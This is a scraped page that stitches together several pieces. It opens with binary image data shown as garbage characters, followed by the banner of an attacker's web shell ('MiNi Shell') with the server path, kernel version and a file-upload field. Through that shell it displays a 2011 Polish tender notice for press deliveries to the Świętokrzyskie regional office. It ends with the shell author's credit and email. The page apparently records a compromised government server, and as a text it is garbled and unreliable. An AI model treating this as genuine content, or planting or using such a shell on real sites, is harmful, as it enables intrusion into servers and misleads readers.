JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111117/300289-N-2011.html

<p class="kh_header"><b>Kielce: DOSTAWA PRASY I WYDAWNICTW NA 2012 ROK NA POTRZEBY URZĘDU MARSZAŁKOWSKIEGO WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO</b><br>
<b>Numer ogłoszenia: 300289 - 2011; data zamieszczenia: 17.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 041 3443347, 3421549, 3421602, faks 041 3445265.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA PRASY I WYDAWNICTW NA 2012 ROK NA POTRZEBY URZĘDU MARSZAŁKOWSKIEGO WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa prasy dotyczącej 2012 roku, tj.: dzienników, tygodników, dwutygodników, miesięczników, kwartalników i innych czasopism oraz dzienników ustaw, dzienników urzędowych i monitorów. Przedmiot zamówienia obejmuje również transport prasy na koszt i ryzyko wykonawcy wraz z dostawą i rozładunkiem w miejscach wskazanych przez zamawiającego. 2.	Zamawiający nie podzielił niniejszego zamówienia na części i nie dopuszcza składania ofert częściowych. 
3.	Szczegółowy opis i zakres ilościowy przedmiotu zamówienia zawarty został 
w Załączniku Nr 1 do SIWZ oraz w dodatku nr 2 do SIWZ - Formularz cenowy. Wypełniony zgodnie z wymaganiami zamawiającego i podpisany przez wykonawcę Formularz cenowy stanowić będzie załącznik do oferty składanej przez wykonawcę. Wskazane tam tytuły zamawianej prasy są uzasadnione potrzebami zamawiającego.  
4.	W okresie realizacji zamówienia, o którym mowa w rozdziale IV SIWZ, wykonawca zobowiązany będzie do sukcesywnego dostarczenia prasy dotyczącej 2012 roku, 
w asortymencie i ilościach określonych w Załączniku Nr 1 do SIWZ. Zamówienie nie obejmuje prasy, która ukaże się w 2012 roku ale dotyczy roku 2011. 
UWAGA: Dostarczona przez wykonawcę prasa, która nie jest objęta przedmiotowym zamówieniem traktowana będzie jako dostawa prasy bezpłatnej.
5.	Zamawiający wymaga, aby wykonawca segregował dostarczaną prasę na 7 pakietów, których zawartość, miejsce i termin dostawy  przedstawiona została w Załączniku Nr 1 do SIWZ. Każdy z wymienionych tam pakietów musi być konfekcjonowany przez wykonawcę przy użyciu papierowej banderoli, na której powinna być naniesiona w trwały sposób nazwa miejsca wskazanego przez zamawiającego.
6.	Wykonawca zobowiązany będzie do wystawiania dowodów dostawy dla każdego pakietu oddzielnie, które stanowić będą potwierdzenie dostaw wymienionych w nich tytułów prasy. Dokumenty te stanowić będą podstawę do dokonywania rozliczeń finansowych między zamawiającym a wykonawcą.
7.	W okresie realizacji zamówienia, o którym mowa w rozdziale IV SIWZ, wykonawca zobowiązany będzie do zapewnienia ciągłości prenumeraty i terminowej dostawy od wydawnictw zamawianej prasy.
8.	Wykonawca zobowiązany będzie do dostarczania prasy zamawiającemu wg następujących zasad: 
-	Dzienniki będą dostarczane zamawiającemu w dniu ich ukazania się na rynku (poniedziałek - piątek) w godzinach i do miejsc wskazanych w Załączniku nr 1 do SIWZ. Dzienniki ukazujące się w dzień wolny od pracy zamawiającego będą dostarczane zamawiającemu pierwszego dnia roboczego po dniu wolnym. 
O konieczności dostarczenia dzienników w dzień inny niż powszedni (tj. poniedziałek - piątek) wykonawca zostanie powiadomiony pisemnie przez zamawiającego z co najmniej 5-cio dniowym wyprzedzeniem.
-	Tygodniki będą dostarczane zamawiającemu w terminie maks. 2 dni od dnia ukazania się ich na rynku. W przypadku, gdy drugi dzień jest dniem wolnym od pracy zamawiającego, wykonawca dostarczy je w pierwszym dniu roboczym po dniu wolnym.
-	Pozostała prasa będzie dostarczana zamawiającemu w terminie maks. 5 dni od dnia ukazania się na rynku. W przypadku, gdy piąty dzień jest dniem wolnym od pracy zamawiającego wykonawca dostarczy prasę w pierwszym dniu roboczym po dniu wolnym.
9.	Wykonawca musi zaoferować przedmiot zamówienia zgodny z wymaganiami zamawiającego, określonymi w niniejszym rozdziale SIWZ oraz w Załączniku Nr 1 do SIWZ. 
10.	W przypadku wystąpienia uszkodzeń dostarczonego przedmiotu zamówienia, powstałych na skutek zabrudzenia, zmoknięcia oraz wad materiałowych, wykonania lub innych wad ukrytych wykonawca zobowiązany będzie do jego wymiany na wolny od wad. Wymagany przez zamawiającego czas reakcji na wymianę przedmiotu zamówienia wynosi 2 godziny, licząc od chwili zgłoszenia telefonicznego każdego żądania przez zamawiającego. 
11.	Wszelkie reklamacje dotyczące ilości, jakości i wartości dostarczanego przedmiotu zamówienia zgłaszane będą przez zamawiającego telefonicznie wykonawcy do godziny 11:00 w dniu dostawy, której reklamacja dotyczy. Po upływie w/w terminu dostawę uważa się za przyjętą zgodnie z dowodem dostawy.
12.	Zamawiający dopuszcza powierzenie wykonania zamówienia podwykonawcom. W takim przypadku zamawiający żąda wskazania przez wykonawcę w swojej ofercie części (zakres) zamówienia, którą zamierza powierzyć podwykonawcom. Nie dopełnienie ww. obowiązku oznaczać będzie, iż wykonawca wykona przedmiot zamówienia samodzielnie.
13.	Zlecenie części przedmiotu zamówienia podwykonawcom nie zmienia zobowiązań wykonawcy wobec zamawiającego. Wykonawca będzie odpowiedzialny za działania, uchybienia i zaniedbania podwykonawców i ich pracowników w takim samym stopniu jakby to były działania, uchybienia i zaniedbania jego własnych pracowników.
14.	Rozliczenia między zamawiającym i wykonawcą prowadzone będą w złotych polskich jeden raz na kwartał.
15.	Szczegółowe zasady określające sposób realizacji zamówienia, rozliczeń, przewidywane przez zamawiającego możliwości dokonania zmian umowy i warunki takich zmian oraz wysokość kar umownych zawarte zostały w dodatku nr 5 do SIWZ - Istotne postanowienia umowy. 
16.	Miejsca dostaw przedmiotu zamówienia w poszczególnych pakietach określone zostały 
w Załączniku Nr 1 do SIWZ. W uzasadnionych przypadkach Zamawiający zastrzega sobie prawo zmiany miejsca dostaw przedmiotu zamówienia w poszczególnych pakietach oraz zmiany ilości pakietów. Zmiana ilości pakietów nie spowoduje zmiany ilości dostarczanej prasy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.20.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają niezbędna wiedzę i
doświadczenie.Zamawiający oceni spełnienie tego warunku według zasady spełnia/nie spełnia,
na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych załączonego
do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednim
potencjałem technicznym. Zamawiający oceni spełnienie tego warunku według zasady
spełnia/nie spełnia, na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień
publicznych załączonego do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do
wykonania zamówienia. Zamawiający oceni spełnienie tego warunku według zasady spełnia/nie
spełnia, na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych
załączonego do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy znajdują się w sytuacji
ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Zamawiający oceni spełnienie
tego warunku według zasady spełnia/nie spełnia, na podstawie Oświadczenia z art. 22 ust. 1
ustawy Prawo zamówień publicznych załączonego do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz oferty - wg wzoru określonego w dodatku nr 1 do SIWZ. 
2.	Wypełniony Formularz cenowy - wg wzoru określonego w dodatku nr 2 do  SIWZ.
3.	W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawców występujących wspólnie (dotyczy również spółki cywilnej) - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub  poświadczona notarialnie kopia). 
4.	Pełnomocnictwo określające jego zakres - w przypadku gdy wykonawcę reprezentuje pełnomocnik (oryginał, poświadczona notarialnie kopia).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wzór umowy stanowi dodatek nr 5 do niniejszej SIWZ. Zamawiający wymaga od wykonawcy, aby zaakceptował wzór umowy (oświadczenie zawarte w dodatku nr 1 do SIWZ - Formularz oferty), a w przypadku dokonania przez zamawiającego wyboru jego oferty jako najkorzystniejszej - zawarł z nim umowę w sprawie udzielenia zamówienia publicznego na zawartych w niej warunkach. 
2.	Zmiana umowy, dotycząca okresu realizacji zamówienia może nastąpić w przypadku gdy zawarcie umowy nastąpi później niż w miesiącu grudniu 2011 roku. W takim przypadku zmianie ulegnie zakres ilościowy zamówienia oraz wynagrodzenie wykonawcy, które ustalone zostanie na podstawie zaoferowanych cen jednostkowych oraz ilości zamawianej prasy, wynikającej ze zmiany czasu trwania umowy.
3.	Zaoferowane przez Wykonawcę ceny jednostkowe brutto w Formularzu cenowym stanowiącym dodatek do oferty, wpływające na zawartą w umowie wartość wynagrodzenia, mogą ulec zmianie tylko na skutek zmiany przepisów o podatku od towarów i usług. W takim przypadku Wykonawca przedłoży Zamawiającemu stosowne zestawienia, wskazujące podstawę do wprowadzenia w/w zmian. 
4.	W przypadku wystąpienia okoliczności, o których mowa w pkt 3, zmianie może ulec wartość wynagrodzenia Wykonawcy. Ostateczna wysokość wynagrodzenia należnego Wykonawcy będzie uzależniona od stawki podatku VAT, obowiązującej w dacie powstania obowiązku podatkowego w czasie trwania umowy.
5.	Zmiany ilościowe poszczególnych tytułów prasy, wynikające ze zmiany potrzeb Zamawiającego, mogą nastąpić tylko w ramach kwoty wynagrodzenia brutto Wykonawcy, z uwzględnieniem zmian określonych w pkt. 3 i 4.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.sejmik.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski
Województwa Świętokrzyskiego w Kielcach al. IX Wieków Kielc 3, 25-516 Kielce, Budynek C-2, pokój 345,
III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.11.2011 godzina 10:00, miejsce: Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach al. IX Wieków
Kielc 3, 25-516 Kielce, Budynek C-2, pokój 146 (Kancelaria Ogólna, I piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com